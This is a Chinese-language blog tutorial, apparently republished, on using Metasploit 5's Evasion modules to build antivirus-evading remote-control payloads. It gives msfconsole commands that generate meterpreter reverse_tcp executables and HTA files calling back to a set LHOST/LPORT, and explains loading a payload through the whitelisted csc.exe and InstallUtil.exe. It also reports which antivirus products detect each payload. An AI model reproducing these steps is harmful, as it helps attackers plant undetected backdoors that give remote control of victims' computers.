远控免杀4---Evasion免杀
0x01 免殺能力一覽表
- 1、下表中標(biāo)識(shí) √ 說明相應(yīng)殺毒軟件未檢測(cè)出病毒,也就是代表了Bypass。
- 2、為了更好的對(duì)比效果,大部分測(cè)試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
- 3、由于本機(jī)測(cè)試時(shí)只是安裝了360全家桶和火絨,所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動(dòng)態(tài)查殺。360殺毒版本5.0.0.8160(2019.12.12),火絨版本5.0.33.13(2019.12.12),360安全衛(wèi)士12.0.0.2001(2019.12.17)。
- 4、其他殺軟的檢測(cè)指標(biāo)是在virustotal.com(簡稱VT)上在線查殺,所以可能只是代表了靜態(tài)查殺能力,數(shù)據(jù)僅供參考,不足以作為免殺的精確判斷指標(biāo)。
0x02 前言
2019年1月,metasploit升級(jí)到了5.0,引入了一個(gè)新的模塊叫Evasion模塊,官方宣稱這個(gè)模塊可以創(chuàng)建反殺毒軟件的木馬。
evasion有以下幾個(gè)模塊,可以使用show evasion進(jìn)行查看。
0x03 生成載荷
1、生成exe
使用use windows/windows_defender_exe進(jìn)行生成payload
msf5 > use windows/windows_defender_exe msf5 evasion(windows/windows_defender_exe) > set filename payload.exe msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3 msf5 evasion(windows/windows_defender_exe) > set LPORT 3333 msf5 evasion(windows/windows_defender_exe) > run
注意要復(fù)制產(chǎn)生的exe到另一個(gè)位置
不打開殺軟的情況下,可正常上線:
注意-H和-P,H和P都是大寫
能夠上線
打開殺軟,目前已經(jīng)無法過360和火絨,看網(wǎng)上資料在該模塊剛出來時(shí)是可以過360的。
2、生成hta
用另外一個(gè)evasion模塊windows/windows_defender_js_hta生成一下,360同樣被殺
use windows/windows_defender_js_htaset filename payload.htaset lhost 192.168.142.134set lport 5555exploitmv /root/.msf4/local/payload.hta /root/shell/payload.hta
但是火絨靜態(tài)+行為查殺都沒發(fā)現(xiàn)問題,可正常上線
3、生成install_util
evasion還提供了其他幾個(gè)模塊,比如windows/applocker_evasion_install_util
創(chuàng)建payload
根據(jù)說明,需要使用csc.exe進(jìn)行編譯一下,然后用InstallUtil.exe加載文件。
csc.exe是微軟.NET Framework 中的C#語言編譯器,本機(jī)安裝了.net后就可以找到該文件。我這里用vs2017里的csc.exe進(jìn)行編譯,生成install_util.exe。
直接執(zhí)行install_util.exe是沒有任何反應(yīng)的,需要使用InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe來加載。
注意的是,如果生成的是32位的payload,就要用32位的.net下的InstallUtil來加載,否則文件會(huì)無法執(zhí)行。
靜態(tài)查殺都沒有問題,執(zhí)行時(shí)360行為查殺會(huì)報(bào)毒。
0x04 小結(jié)
在evasion中共提供了6個(gè)免殺模塊,大家都可以進(jìn)行嘗試。上文中第三個(gè)免殺利用csc白名單加載payload的方式還有很多種,網(wǎng)上也有很多介紹,侯亮大神也提到了很多類似的白名單軟件。
而且在2019年1月msf5更新的不止evasion模塊,還有個(gè)更強(qiáng)大的模板編譯函數(shù)Metasploit::Framework::Compiler,提供了更強(qiáng)大的自定義免殺機(jī)制。后面文章會(huì)講述該模塊使用。
0x05 參考
applocker_evasion_install_util.md:https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md
基于白名單Csc.exe執(zhí)行payload:https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji
總結(jié)
以上是生活随笔為你收集整理的远控免杀4---Evasion免杀的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 远控免杀专题3---msf自免杀
- 下一篇: 联想yoga笔记本,yoga是什么意思?